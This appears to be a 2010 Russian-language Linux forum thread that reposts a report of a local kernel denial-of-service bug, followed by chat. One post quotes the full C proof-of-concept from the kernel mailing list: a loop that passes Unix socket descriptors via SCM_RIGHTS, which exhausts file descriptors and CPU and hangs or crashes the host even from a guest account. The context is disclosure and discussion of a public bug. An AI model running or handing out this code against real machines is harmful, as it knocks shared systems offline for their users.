Привет, Гость!
Главная
Вход

Последняя активность

Форум / Компы / Линупс
Поиск
  Локальная уязвимость в ядре линукс (и не только), DoS
M7R M7R [Off] [#] (26.11.2010 / 17:24)
цитирую с хабра
Опубликован код, приводящий к зависанию компьютера (100% загрузка всех ядер, исчерпание файловых дескрипторов).

Ссылка на код: lkml.org/lkml/2010/11/25/8

Проверял на 27, 32 — зависание воспроизводится. 32/64 бита.

Уточняю: через 1-2 секунды пролетает крашдамп (не успеваю прочитать), хост перегружается. В другом тесте система упала уже после завершения программы (примерно через 5-7 секунд).

PS Эксперты с лора говорят, что FreeBSD 8.1 тоже падает.

PPS Внезапно — на CentOS 5.5 с 2.6.18 не падает. Если запустить из-под рута, роняет, из-под пользователя — просто спокойно отрабатывает. При этом руту в соседней консоли ничего не мешает работать и система не падает.
M7R M7R [Off] [#] (26.11.2010 / 17:25)
код
  1. Simple kernel attack using socketpair. easy, 100% reproductiblle,
  2. works under guest. no way to protect :(
  3.  
  4. See source attached.
  5.  
  6. Process become in state 'Running' but not killalble via kill -KILL.
  7.  
  8. eat 100% CPU, eat all available internal  file descriptors  in kernel :(
  9.  
  10. -- 
  11. Segmentation fault
  12. #include <sys/socket.h>
  13. #include <sys/un.h>
  14.  
  15. static int send_fd (int unix_fd, int fd)
  16. {
  17.   struct msghdr msgh;
  18.   struct cmsghdr *cmsg;
  19.   char buf[CMSG_SPACE (sizeof (fd))];
  20.   memset (&msgh, 0, sizeof (msgh));
  21.   memset (buf, 0, sizeof (buf));
  22.  
  23.   msgh.msg_control = buf;
  24.   msgh.msg_controllen = sizeof (buf);
  25.  
  26.   cmsg = CMSG_FIRSTHDR (&msgh);
  27.   cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
  28.   cmsg->cmsg_level = SOL_SOCKET;
  29.   cmsg->cmsg_type = SCM_RIGHTS;
  30.  
  31.   msgh.msg_controllen = cmsg->cmsg_len;
  32.  
  33.   memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
  34.   return sendmsg (unix_fd, &msgh, 0);
  35. }
  36.  
  37. int main ()
  38. {
  39.   int fd[2], ff[2];
  40.   int target;
  41.   if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)
  42.     return 1;
  43.   for (;;)
  44.   {
  45.     if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
  46. 	return 2;
  47.     send_fd (ff[0], fd[0]);
  48.     send_fd (ff[0], fd[1]);
  49.     close (fd[1]);
  50.     close (fd[0]);
  51.     fd[0] = ff[0];
  52.     fd[1] = ff[1];
  53.   }
  54. }
M7R M7R [Off] [#] (26.11.2010 / 17:26)
линк на первоисточник
http://habrahabr.ru/blogs/linux/108835/
Seq)I(b)i( Seq)I(b)i( [Off] [#] (26.11.2010 / 18:19)
"
* seriyPS,
* 26 ноября 2010, 01:18
Чтоб слишком обидно не было вот: Повышение привилегий в Microsoft Windows тоже свежачок от 25 ноября
http://www.securitylab.ru/vuln ... 3.php
"
гг,а то хаить счаз начнут линь.
VARG VARG [Off] [#] (26.11.2010 / 18:22)
сумашетшый псих
Seq)I(b)i( (26.11.2010/21:19)
а то хаить счаз начнут линь.
зы: превед
Seq)I(b)i( Seq)I(b)i( [Off] [#] (26.11.2010 / 18:24)
VARG, йоу гг
Изм. Seq)I(b)i( (26.11.2010 / 18:24) [1]
xommos xommos [Off] [#] (26.11.2010 / 18:39)
Phobia (26.11.2010/21:25)
А мне пох у мя нортон камандр ггхортон хуярдир рулит
Борман Борман [Off] [#] (26.11.2010 / 19:08)
Сега рулиииит!!!!!!
ггг кстате надыбал иешний эмулятор с прогами. типерь мой комп превратился в сегу.
Борман Борман [Off] [#] (26.11.2010 / 19:16)
Phobia, слушай, встреться с маей сестрёнкай в Ташкенте.настрой ей телефон для работы в инете.ну там мини оперу,аську.а то дорого эсэмэсица.смагёшъ?
  Всего: 9

Фильтр по автору
Скачать тему

Форум

Новые вверху
0 / 43

Gazenwagen Gegenkulturelle Gemeinschaft